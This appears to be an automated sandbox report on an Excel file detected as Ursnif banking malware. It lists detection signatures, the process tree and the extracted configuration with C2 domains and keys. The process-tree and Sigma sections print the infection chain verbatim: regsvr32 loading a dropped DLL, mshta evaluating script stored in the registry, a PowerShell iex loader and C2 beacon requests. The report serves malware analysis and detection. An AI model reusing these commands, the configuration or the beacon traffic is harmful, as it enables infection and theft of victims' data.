Play interactive tour

Edit tour

Windows Analysis Report documentation_39236.xlsb

Overview

General Information

Sample Name:	documentation_39236.xlsb
Analysis ID:	445916
MD5:	31ed7b3f7d7173afe801858e30c0fb62
SHA1:	40376b923682dc858806071f97cb64f781142dbb
SHA256:	8081a3a7be80c197b850d2c1e3cac75944d3fb55fda2b312815f565616366843
Infos:
Most interesting Screenshot:

Detection

Ursnif

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Document exploit detected (creates forbidden files)

Document exploit detected (drops PE files)

Found malware configuration

Multi AV Scanner detection for domain / URL

Sigma detected: Encoded IEX

Sigma detected: Office product drops executable at suspicious location

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Yara detected Ursnif

Document exploit detected (UrlDownloadToFile)

Document exploit detected (process start blacklist hit)

Office process drops PE file

Sigma detected: MSHTA Spawning Windows Shell

Sigma detected: Microsoft Office Product Spawning Windows Shell

Sigma detected: Mshta Spawning Windows Shell

Sigma detected: Suspicious Csc.exe Source File Folder

Suspicious powershell command line found

Writes or reads registry keys via WMI

Writes registry values via WMI

Abnormal high CPU Usage

Compiles C# or VB.Net code

Contains functionality to call native functions

Contains functionality to query CPU information (cpuid)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found evasive API chain (date check)

Found evasive API chain checking for process token information

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Queries the installation date of Windows

Queries the volume information (name, serial number etc) of a device

Registers a DLL

Sample execution stops while process was sleeping (likely an evasion)

Searches for the Microsoft Outlook file path

Tries to load missing DLLs

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara detected Xls With Macro 4.0

Classification

Process Tree

System is w10x64

EXCEL.EXE (PID: 5056 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)

regsvr32.exe (PID: 2576 cmdline: regsvr32 -s C:\Users\Public\Documents\decrypt.dll MD5: 426E7499F6A7346F0410DEAD0805586B)

regsvr32.exe (PID: 5236 cmdline: regsvr32 -s C:\Users\Public\Documents\decrypt.dll MD5: 426E7499F6A7346F0410DEAD0805586B)

iexplore.exe (PID: 5008 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)

iexplore.exe (PID: 4700 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5008 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

iexplore.exe (PID: 5500 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)

iexplore.exe (PID: 5944 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5500 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

iexplore.exe (PID: 4716 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5500 CREDAT:17416 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

iexplore.exe (PID: 5740 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5500 CREDAT:82956 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

iexplore.exe (PID: 1720 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5500 CREDAT:17428 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

mshta.exe (PID: 3128 cmdline: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Copx='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Copx).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>' MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)

powershell.exe (PID: 3936 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)) MD5: 95000560239032BC68B4C2FDFCDEF913)

conhost.exe (PID: 5748 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

csc.exe (PID: 5304 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\zctvvvtu\zctvvvtu.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)

mshta.exe (PID: 5780 cmdline: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Hl1h='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Hl1h).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>' MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)

powershell.exe (PID: 5196 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)) MD5: 95000560239032BC68B4C2FDFCDEF913)

conhost.exe (PID: 5164 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

csc.exe (PID: 1364 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\a2r2fkec\a2r2fkec.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)

cleanup

Malware Configuration

Threatname: Ursnif

{"lang_id": "RU, CN", "RSA Public Key": "48n489DADvQETiNETBHyPBGGvRa6csWtqIuLSVOWYWKKC10mrbaCDTGmXT9+yBdCxu5rsz9H10sEVOKS1YbQqCSO7vHhJ4AqplAi0EpahHSG6iAjqlB8Ka8e19eFq+oWTyXFXNaCOa1ztfMCxuyaqADn0yfjtWeuipBCZ+WgBEXPEGD6cctVIddqMNHa0kzmsNtadDWoPRLlm3WMxbPQCRP0dzRx5jDY+C8wai2SJ7DJITIcBRF1En7YoFGFEsOcJvmCr4+vI12IDpy+U6ARTXUjcxKOcCsi8f3JnvpXpMyaus8R6AAz7bUHl5rTZsgEcjzMHpe+df4LlMvsTqR94H38v4JAsBa+Wcc33Pvxw/o=", "c2_domain": ["gtr.antoinfer.com", "app.bighomegl.at"], "botnet": "1500", "server": "580", "serpent_key": "OkOYg3xmZhahWmvv", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "10"}

Yara Overview

Initial Sample

Source	Rule	Description	Author	Strings
app.xml	JoeSecurity_XlsWithMacro4	Yara detected Xls With Macro 4.0	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000013.00000003.508793933.0000000005738000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000013.00000003.508759247.0000000005738000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000013.00000003.508819476.0000000005738000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000003.00000003.411957077.0000000004E08000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000013.00000003.508778168.0000000005738000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000003.00000003.411794580.0000000004E08000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000003.00000003.411858229.0000000004E08000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000003.00000003.411885260.0000000004E08000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000003.00000003.472132410.0000000004B0E000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000013.00000003.531333562.000000000553C000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000013.00000003.508710785.0000000005738000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000003.00000003.411972809.0000000004E08000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000003.00000003.429184025.0000000004C0C000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000003.00000003.428651984.0000000004D89000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000013.00000003.520271501.00000000056B9000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000013.00000003.508809489.0000000005738000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000003.00000003.411764136.0000000004E08000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000003.00000003.411824879.0000000004E08000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000013.00000003.508736134.0000000005738000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000013.00000003.508679200.0000000005738000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000003.00000003.411905435.0000000004E08000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Process Memory Space: regsvr32.exe PID: 5236	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Click to see the 17 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
19.3.regsvr32.exe.56b94a0.2.raw.unpack	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
3.3.regsvr32.exe.4d894a0.2.raw.unpack	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security

Sigma Overview

System Summary:

Sigma detected: Encoded IEX

Show sources

Source: Process started

Author: Florian Roth: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Copx='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Copx).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 3128, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), ProcessId: 3936

Sigma detected: MSHTA Spawning Windows Shell

Show sources

Source: Process started

Author: Michael Haag: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Copx='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Copx).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 3128, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), ProcessId: 3936

Sigma detected: Microsoft Office Product Spawning Windows Shell

Show sources

Source: Process started

Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: regsvr32 -s C:\Users\Public\Documents\decrypt.dll, CommandLine: regsvr32 -s C:\Users\Public\Documents\decrypt.dll, CommandLine|base64offset|contains: ,, Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 5056, ProcessCommandLine: regsvr32 -s C:\Users\Public\Documents\decrypt.dll, ProcessId: 2576

Sigma detected: Mshta Spawning Windows Shell

Show sources

Source: Process started

Sigma detected: Suspicious Csc.exe Source File Folder

Show sources

Source: Process started

Author: Florian Roth: Data: Command: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\zctvvvtu\zctvvvtu.cmdline', CommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\zctvvvtu\zctvvvtu.cmdline', CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3936, ProcessCommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\zctvvvtu\zctvvvtu.cmdline', ProcessId: 5304

Sigma detected: Non Interactive PowerShell

Show sources

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Copx='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Copx).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 3128, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), ProcessId: 3936

Data Obfuscation:

Sigma detected: Office product drops executable at suspicious location

Show sources

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ProcessId: 5056, TargetFilename: C:\Users\Public\Documents\decrypt.dll

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 00000003.00000003.266469751.0000000000530000.00000040.00000001.sdmp

Malware Configuration Extractor: Ursnif {"lang_id": "RU, CN", "RSA Public Key": "48n489DADvQETiNETBHyPBGGvRa6csWtqIuLSVOWYWKKC10mrbaCDTGmXT9+yBdCxu5rsz9H10sEVOKS1YbQqCSO7vHhJ4AqplAi0EpahHSG6iAjqlB8Ka8e19eFq+oWTyXFXNaCOa1ztfMCxuyaqADn0yfjtWeuipBCZ+WgBEXPEGD6cctVIddqMNHa0kzmsNtadDWoPRLlm3WMxbPQCRP0dzRx5jDY+C8wai2SJ7DJITIcBRF1En7YoFGFEsOcJvmCr4+vI12IDpy+U6ARTXUjcxKOcCsi8f3JnvpXpMyaus8R6AAz7bUHl5rTZsgEcjzMHpe+df4LlMvsTqR94H38v4JAsBa+Wcc33Pvxw/o=", "c2_domain": ["gtr.antoinfer.com", "app.bighomegl.at"], "botnet": "1500", "server": "580", "serpent_key": "OkOYg3xmZhahWmvv", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "10"}

Multi AV Scanner detection for domain / URL

Show sources

Source: gtr.antoinfer.com

Virustotal: Detection: 7%

Perma Link

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_001E39C5 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,		3_2_001E39C5
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 19_2_00FB39C5 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,		19_2_00FB39C5

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File opened: C:\Windows\SysWOW64\MSVCR100.dll

Jump to behavior

Source: unknown

HTTPS traffic detected: 162.241.253.78:443 -> 192.168.2.3:49725 version: TLS 1.2

Source:	Binary string: partial method>An expression tree may not contain an unsafe pointer operationAAn expression tree may not contain an anonymous method expressionHAn anonymous method expression cannot be converted to an expression tree@Range variable '%1!ls!' cannot be assigned to -- it is read onlyPThe range variable '%1!ls!' cannot have the same name as a method type parameterKThe contextual keyword 'var' cannot be used in a range variable declarationaThe best overloaded Add method '%1!ls!' for the collection initializer has some invalid argumentsAAn expression tree lambda may not contain an out or ref parameterJAn expression tree lambda may not contain a method with variable argumentsSSpecify debug information file name (default: output file name with .pdb extension)$Specify a Win32 manifest file (.xml))Do not include the default Win32 manifestNSpecify an application configuration file containing assembly binding settings8Output line and column of the end location of each errorFBuild a Windows Runtime intermediate file that is consumed by WinMDExp Build an Appcontainer executable+Specify the preferred output language name.3Could not write to output file '%2!ls!' -- '%1!ls!' source: csc.exe, 0000002F.00000002.582791755.000001E9AE630000.00000002.00000001.sdmp, csc.exe, 00000030.00000002.583021854.0000021D92B10000.00000002.00000001.sdmp
Source:	Binary string: mscorlib.pdb source: csc.exe, 0000002F.00000002.590444392.000001E9B11EC000.00000002.00000001.sdmp
Source:	Binary string: c:\Reply-quite\Cry_Country\523\Gave\Color\shape.pdb source: app[1].dll.1.dr

Software Vulnerabilities:

Document exploit detected (creates forbidden files)

Show sources

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\app[1].dll			Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File created: C:\Users\Public\Documents\decrypt.dll			Jump to behavior

Document exploit detected (drops PE files)

Show sources

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File created: app[1].dll.1.dr

Jump to dropped file

Document exploit detected (UrlDownloadToFile)

Show sources

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

Section loaded: unknown origin: URLDownloadToFileA

Jump to behavior

Document exploit detected (process start blacklist hit)

Show sources

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

Process created: C:\Windows\SysWOW64\regsvr32.exe

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49755 -> 165.232.183.49:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49755 -> 165.232.183.49:80
Source: Traffic	Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49757 -> 165.232.183.49:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49757 -> 165.232.183.49:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49759 -> 165.232.183.49:80
Source: Traffic	Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49760 -> 165.232.183.49:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49760 -> 165.232.183.49:80
Source: Traffic	Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49762 -> 165.232.183.49:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49762 -> 165.232.183.49:80
Source: Traffic	Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49761 -> 165.232.183.49:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49761 -> 165.232.183.49:80

Source: Joe Sandbox View

ASN Name: ALLEGHENYHEALTHNETWORKUS ALLEGHENYHEALTHNETWORKUS

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: global traffic	HTTP traffic detected: GET /7lD6H27N_2/BPcjmtAv0Zw4YWBW5/_2Fxf1uK6WCO/_2Fjr90UDnf/fvsahgiWLN_2Bo/Vmn_2FfIBHwVISTOJqyyE/yxzQpB4UhTtBihgn/15wt67RuhdWC2bp/AA4QTb7hSSc7ibwOLz/pdYBrbn9P/IhNkxf132wscOBr5M107/x3K_2BnAOaEK3ZrGH_2/BhQbh5Iq3KL0HGqeYocdUa/aitTSocVb3Ei8/K8Yn7wxH/8ZzNnAARdlf1lpPkD_2FTSI/88hMX1xgXx/WKheFQm4ijbivR_2F/Zqk2tiAD1SrE/7_2FLrw5q4N/ROSXMe9TmWNzIt/lpE2Vas7vRgwYKuDJRzfN/M8anWcq HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: gtr.antoinfer.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: gtr.antoinfer.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xFDxUxdbnv/F6OYsZZ54L9nW_2Fn/67TmggSh_2FJ/XC_2BJ4ptUf/_2Bn4_2BufrBke/X9TaUVAWE43KR_2BAaOOd/VFdvQg3iI5nNB7ro/WwH2QRd3S4Jpyvs/BAGj3S8XfXokbtiE7i/hiopX3wKc/HclUJ6ir4iZ2Wbahh_2F/U4T4cSpeeoulqiraG2L/OcnB_2BpDFDp4gpBC5Tkhs/w68xYDIGC4qQh/4p7XqKDy/ZmjFv4NCLUhiS0t8WoyKwxb/hab8TjugII/SNATkC5REfp7kWCrA/g3JBPajXKX1i/qwbd_2FPu7J/lLmh_2BCbPNt2x/W33zXC7gkL52CnQJHgKW5/o596c7z HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: gtr.antoinfer.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /k_2Bld_2B868iR7p/iSLerqiJRFRfRPj/I3sykOYq_2B_2BHlkm/lN1n6_2F_/2BoCebPKrVZFk5Ykbc8d/ir2ifxTr4LNwVXB57AO/naMzNC0NRqAZpafqf_2BA_/2Be4kMQ_2Bs4v/p3vimkya/tnJRXZOQhgPrD4eJIIoOBmz/6_2FqS0VmH/GdEp4ZZJMOcj3fIll/Gr7XyTEKPabp/aWzveP_2B5R/CbkrZ6KMbYewce/4JBfvb8ftJcY5XJZOep1x/uKyVwvTYfdKUGuNG/Emm_2BOgQKRpwFp/DFm1TypwhIB6euZx4o/ZnwoOdebK/P2zkNdJ1mC1FOPRaBbHj/tGtvylAtqDtqZZGz2/K HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: gtr.antoinfer.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: gtr.antoinfer.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /MpeUKSeGn_2/Bk4DEtluQu8Y9R/36MpR_2BhUMN_2FXN2dO6/hANnmINzHP5reb6i/6KJxoqvLxdOtysJ/n0kMUo2t6MOWkWv9fh/vWxI1agPy/wQGFAQHZyVrGmWgCFodY/7FxYiI_2B53c0enExOR/GrTPqZ6XXPPo3SV3TEozm4/Exzy5YwFrUkYs/bQh_2FMD/0GOF4z17cCRm_2Fd6CEZwMn/XbmChIoDCR/BVkOjJKAuaNi81j2s/DAsZ7IX3Y_2F/9MNFRd8bZDE/rF3vDAxY3XVSH_/2BRf6xlnVaI7w67ANQeYN/HlP9zkWlJUqCL5u9/iWI0VgGL0n3Ke_2/BO2nUtcdX/UZ97 HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: gtr.antoinfer.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /IW0KvL6zqxcwdal5Ue/sV05YuqDL/CUY_2FYXWgTEAN2MleRL/cOthmAfIFOrxcxXsh59/7AJjgFXMm7GK3zI8vuZf8x/2APU8PDwtmpAr/ANYuz5rb/u_2Ba0GWu8ipmpUp8uWalIe/b1DgDagPuJ/QMf4e8CmCgrJh1KOA/BEoe0WcWQ2Nu/avlRE03_2BA/ikzAyiPbN_2BHy/_2BYBLI5BgaFwR91PIKzH/SJ1rXSKpXvP3w4_2/BgNlAxmgSpCbzA3/rA6BVOnt_2Fs0ge7Ub/mZV_2ByZe/27QR_2F_2BkAwlW65Zcm/dBBVfaC3K9GAjFa76dp/yXioP6kRbgfKWsmcnd8JPP/othn HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: gtr.antoinfer.comConnection: Keep-Alive
